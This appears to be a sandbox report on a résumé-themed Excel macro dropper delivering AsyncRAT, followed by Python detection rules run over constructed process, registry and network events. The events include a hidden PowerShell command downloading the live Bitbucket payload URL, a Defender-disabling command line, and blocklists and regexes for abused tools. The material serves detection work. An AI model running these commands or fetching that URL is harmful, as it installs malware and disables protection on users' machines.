General

Target: Curriculo Laura Sperandio (ps).xlsm
Size: 23KB
Sample: 201224-zwgdeqncge
MD5: dbad290342a0f6cd2554a4d7b06ff400
SHA1: ea9e6a18734a7a389eaa66eace35c84ede9152c3
SHA256: cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10
SHA512: a26c41a262c375fce4369b51ee19283504e7aeed975416551f193b00313a083a26a034e69bcff59b6719b006e0dfb0ec4fb295ba6426a12a5d901c5c1810dc63
Static task: static1

Behavioral task: behavioral1
  Sample: Curriculo Laura Sperandio (ps).xlsm
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: Curriculo Laura Sperandio (ps).xlsm
  Resource: win10v20201028
Malware Config

Extracted: https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe
Targets

Target: Curriculo Laura Sperandio (ps).xlsm
Size: 23KB
Score: 10/10

Signatures:
- Contains code to disable Windows Defender: a .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
- Process spawned unexpected child process: this typically indicates the parent process was compromised via an exploit or macro.
- Async RAT payload
- Blocklisted process makes network request
- Executes dropped EXE
- Uses the VBS compiler for execution
- Adds Run key to start application
- Legitimate hosting services abused for malware hosting/C2
- Suspicious use of SetThreadContext
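The signature list above is the sandbox's verdict on this sample; most of those signatures can be reproduced on ordinary endpoint telemetry. The Python block below is an added example, not code from the sandbox or from this report: it runs rule checks modelled on the signatures (an Office parent spawning a child, vbc.exe used as a host process, execution from a drop directory, Run-key persistence, a network request by a blocklisted process to a legitimate hosting domain, a Defender-disabling command line, and cross-process SetThreadContext) over a small set of constructed Sysmon-style events. The process names, file paths, registry key, PIDs and hosting-domain list are assumptions for illustration; the only value taken from the report is the Bitbucket download URL, which is parsed, not fetched. The "Async RAT payload" signature depends on payload family identification and is not reproduced here.

```python
"""Rule checks modelled on the report's signatures, run over constructed
Sysmon-style events. Added example; not the sandbox's own detection code."""
import re
from urllib.parse import urlparse

# Assumed indicator lists for illustration (not exhaustive, not the sandbox's).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
BLOCKLISTED_NET = {"vbc.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "powershell.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
LEGIT_HOSTING = {"bitbucket.org", "github.com", "githubusercontent.com",
                 "pastebin.com", "drive.google.com", "discord.com"}
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\s+-disable|disablerealtimemonitoring|disableblockatfirstseen"
    r"|disableioavprotection|disablebehaviormonitoring", re.IGNORECASE)

def basename(path):
    """Last path component, lower-cased, so rules key on the image name only."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def hosting_domain(url):
    """Return the matching hosting domain (or None) for a URL's host."""
    host = (urlparse(url).hostname or "").lower()
    return next((d for d in LEGIT_HOSTING if host == d or host.endswith("." + d)), None)

def analyze(events):
    """Return (signature, detail) pairs for every rule that fires on the events."""
    hits = []
    for ev in events:
        if ev["type"] == "process_create":
            parent, child = basename(ev["parent"]), basename(ev["image"])
            if parent in OFFICE_PARENTS:   # Office should not spawn script hosts
                hits.append(("Process spawned unexpected child process", f"{parent} -> {child}"))
            if child == "vbc.exe":         # the .NET VB compiler used as a host process
                hits.append(("Uses the VBS compiler for execution", ev["image"]))
            if child.endswith(".exe") and any(d in ev["image"].lower() for d in DROP_DIRS):
                hits.append(("Executes dropped EXE", ev["image"]))
            if DEFENDER_TAMPER.search(ev["cmdline"]):
                hits.append(("Contains code to disable Windows Defender", ev["cmdline"]))
        elif ev["type"] == "registry_set":
            if any(k in ev["key"].lower() for k in RUN_KEYS):
                hits.append(("Adds Run key to start application", f"{ev['key']} = {ev['value']}"))
        elif ev["type"] == "network":
            proc = basename(ev["image"])
            if proc in BLOCKLISTED_NET:
                hits.append(("Blocklisted process makes network request", f"{proc} -> {ev['url']}"))
            dom = hosting_domain(ev["url"])
            if dom:
                hits.append(("Legitimate hosting services abused for malware hosting/C2", dom))
        elif ev["type"] == "api_call":
            # SetThreadContext on a thread of another process is the hollowing step
            # that follows WriteProcessMemory; same-process use is routine.
            if ev["api"] == "SetThreadContext" and ev["target_pid"] != ev["pid"]:
                hits.append(("Suspicious use of SetThreadContext",
                             f"pid {ev['pid']} -> pid {ev['target_pid']}"))
    return hits

def summarize(events):
    """Distinct signatures plus a crude 0-10 score (two points per signature, capped)."""
    names = sorted({name for name, _ in analyze(events)})
    return {"signatures": names, "score": min(10, 2 * len(names))}

# Constructed event chain resembling the report (paths and PIDs are assumed):
# Excel macro -> PowerShell download from Bitbucket -> dropped sz.exe ->
# vbc.exe hollowed -> Run key persistence. Two benign events are included as noise.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SZ = "C:\\Users\\user\\AppData\\Local\\Temp\\sz.exe"
VBC = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
URL = "https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe"  # from the report
SAMPLE_EVENTS = [
    {"type": "process_create", "parent": "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE",
     "image": PS, "cmdline": f"powershell -w hidden (New-Object Net.WebClient).DownloadFile('{URL}','{SZ}')"},
    {"type": "network", "image": PS, "url": URL},
    {"type": "process_create", "parent": PS, "image": SZ, "cmdline": SZ},
    {"type": "process_create", "parent": SZ, "image": VBC, "cmdline": VBC},
    {"type": "process_create", "parent": SZ, "image": PS,
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sz", "value": SZ},
    {"type": "api_call", "api": "SetThreadContext", "pid": 4100, "target_pid": 4120},
    {"type": "process_create", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "api_call", "api": "SetThreadContext", "pid": 4100, "target_pid": 4100},
]

if __name__ == "__main__":
    for name, detail in analyze(SAMPLE_EVENTS):
        print(f"{name}: {detail}")
    print(summarize(SAMPLE_EVENTS))
```

To use this against real data, map your Sysmon or EDR export onto the four event shapes (process creation with parent/image/command line, registry value set, network connection with the originating image, and API calls if your sensor records them); the rules key on lower-cased image names and substrings so casing and drive letters do not matter. The score is a deliberately crude stand-in for the sandbox's weighting and is only there to show how distinct signatures are aggregated.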